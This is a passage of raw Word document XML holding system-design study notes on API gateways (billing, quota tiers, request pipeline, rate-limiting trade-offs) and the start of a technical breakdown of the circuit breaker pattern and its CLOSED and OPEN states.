        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usage-based billing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> The gateway tracks request counts per API key, aggregates them into billing records, and publishes them to a billing system. The rate limit enforcer and the billing counter are the same Redis counter — every allowed request decrements the rate limit and increments the billing meter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232073C9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quota tiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06B37F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20E1EF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Free tier:     1,000 requests/day, 10 requests/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B885CA7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Starter:       100,000 requests/day, 100 requests/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59572970" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>Professional:  1,000,000 requests/day, 1,000 requests/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDDA56B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Enterprise:    Custom limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7520041C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway enforces the tier limits. Tier changes (upgrade/downgrade) take effect at the next billing period — the gateway reads the current tier from the subscription system on each rate limit check (or caches it with a TTL matching the billing period).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684AAB51" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credit-based systems:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Some APIs charge per computation unit rather than per request (ML APIs, search APIs). The gateway deducts credits based on the request's computational complexity — detected from response metadata (e.g., tokens processed by an LLM API). The credit balance is maintained in Redis, decremented per request, and triggers billing alerts as it approaches zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139B3A17" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="39C20666">
          <v:rect id="_x0000_i3835" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45103AE7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB092C0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA99A2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>API Gateway = Specialized Reverse Proxy for API Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E49312" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">            + Cross-Cutting Concern Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EB14B8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">            + Developer Experience Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686DF5D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">            + Observability Aggregation Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33CAD4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="50F8EAE6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The Pipeline (in order of execution):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858691F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  1. TLS termination         → decrypt client traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5B5DB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  2. Route matching          → which service? (trie-based, priority-ordered)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE8C78" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  3. Authentication          → who is this? (JWT validation, API key lookup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF9F73" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  4. Authorization           → can they do this? (RBAC, ABAC, OPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354E00A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  5. Rate limiting           → how much? (token bucket, sliding window, Redis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A238A44" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  6. Request transformation  → adapt request for backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707C3A1B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  7. Backend selection       → which instance? (load balancing + health)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE01C3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  8. Backend request         → forward + wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42267BAB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  9. Response transformation → adapt response for client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59632330" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  10. Observability          → log + metrics + trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49E0FF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="6C497A70" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The Distributed Rate Limiting Hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB18CA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Centralized Redis  → accurate, one Redis call/request, Redis dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B22F233" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Local + periodic sync → approximate, N Redis calls/interval, tolerates Redis hiccups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B248D2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Hybrid adaptive    → sync frequency scales with proximity to limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A08645" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="194BC0C9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Service Discovery Options (from static to dynamic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2FAFF2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Static config → DNS → Service registry → xDS streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627D90FB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  (simple, manual) → → → (dynamic, event-driven, sub-second propagation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062FE4A0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="76626FC4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Architecture Positioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3966A166" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  API Gateway: North-South traffic (external clients → cluster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A8ED0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">               External auth, external rate limiting, API versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1455835A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Service Mesh: East-West traffic (service → service within cluster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9CD99B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">               mTLS, internal circuit breaking, internal observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F54D4D8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="64762B86" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Key Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24709158" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Centralization  ↔  Single Point of Failure (mitigated by stateless horizontal scaling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D849265" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Gateway features ↔  Latency (each plugin adds processing time to every request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F0F3BA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Rate limit accuracy ↔  Redis dependency (centralized = accurate but Redis-dependent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C2E18B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Authentication depth ↔  JWKS availability (if JWKS endpoint is down, auth fails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66534319" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  BFF pattern    ↔  Operational complexity (more gateways = more config to maintain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341F95D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Plugin richness ↔  Upgrade complexity (more plugins = more upgrade testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508321D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the API gateway's position at the network boundary makes it the most powerful leverage point in a microservices architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> — changes to the gateway affect all services simultaneously, while changes to individual services </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>affect only their own traffic. This power cuts both ways: a well-configured gateway provides uniform security, observability, and reliability across all services with zero per-service code changes; a misconfigured gateway brings down all services simultaneously. The API gateway is where </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>policy meets traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — it transforms abstract policies (only authenticated users can call this endpoint, clients are limited to 100 requests per minute, version 1 of the API will sunset on December 31) into concrete, enforced, measurable network behavior. Organizations that invest in a robust, well-observed API gateway layer gain the ability to change cross-cutting behavior across their entire API surface in minutes — without touching a single line of application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1258CB00" w14:textId="77777777" w:rsidR="00563018" w:rsidRDefault="00563018" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="3FACA333" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFDBB22" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="12EE6694">
          <v:rect id="_x0000_i4101" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00FEDE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What a Circuit Breaker Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E3342" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A circuit breaker is not simply "a pattern that stops calling failing services." That definition describes what it does, not why it exists or how it works. A circuit breaker is a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>finite state machine that monitors inter-service communication, accumulates statistical evidence of failure, and adaptively controls traffic flow to prevent a partial system failure from cascading into a total system failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F41560D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The engineering problem it solves is </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failure amplification through continued engagement with a failing dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>. When a downstream service is failing or degraded, the naive behavior — keep trying, keep waiting — is catastrophically wrong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488EF9ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="957"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Every request to the failing service </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>consumes a thread</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> (in thread-per-request models) or an event loop slot (in async models) while waiting for the timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016E4B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="957"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the timeout is 30 seconds and the service is completely down, 100 requests/second × 30 seconds = </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3,000 in-flight requests consuming 3,000 threads</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> before any timeout fires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79505435" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="957"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>At 3,000 threads, the thread pool is exhausted. The calling service cannot process </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> new requests — not even those that don't need the failing downstream service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BB6367" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="957"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The calling service appears to be down. Its callers experience the same problem. The failure propagates up the dependency chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E11A7E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>This is </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cascading failure</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — one service's failure bringing down the entire system, not because the system lacks redundancy, but because failure handling naively amplifies load on already-stressed components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC236D5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit breaker breaks this cycle by </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failing fast</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — instead of waiting 30 seconds for a timeout on a call to a known-failing service, it immediately returns an error in microseconds. The calling thread is freed instantly. Resources are preserved. The rest of the system continues functioning. The blast radius of the downstream failure is </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>contained</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE41CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>But circuit breakers are more than just timeouts. They are </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adaptive</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — they transition through states based on observed failure patterns, automatically detecting recovery without human intervention. This adaptivity is what distinguishes a circuit breaker from a simple timeout or kill switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF26B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="5EE1F070">
          <v:rect id="_x0000_i4102" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC509B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The State Machine — The Core Internal Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D3142" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit breaker is fundamentally a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>three-state finite state machine</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>. Every design decision — window sizes, thresholds, timeouts — is about controlling transitions between these states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377A0D9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Three States and Their Semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F625FA6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CLOSED State (Normal Operation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC53B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit is "closed" — current flows freely. All requests pass through to the downstream service. The circuit breaker monitors outcomes (successes, failures, latencies) but does not interfere with traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23BF31" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Internally, the circuit breaker maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sliding window of call outcomes</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>. Each call result (success, failure, timeout, slow response) is recorded. When the accumulated failure evidence within the window crosses a configured threshold, the circuit transitions to OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186A6104" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The CLOSED state is the equilibrium state — the circuit spends most of its time here. The monitoring overhead must be minimal: recording outcomes must be O(1), and threshold evaluation must be near-O(1). These requirements drive the choice of data structures (ring buffers, atomic counters) rather than lists or sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418A25B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OPEN State (Failing Fast):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001956FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit is "open" — current cannot flow. All requests are </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>immediately rejected without contacting the downstream service</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">. The rejection is not an error from the downstream — </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>it is an error generated by the circuit breaker itself, typically a specific exception or error code that callers can distinguish from genuine downstream errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A6718" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The rejection is effectively instantaneous — microseconds, not the milliseconds or seconds of a timeout. This instant rejection is the fundamental resource-preservation mechanism.</w:t>
      </w:r>
    </w:p>
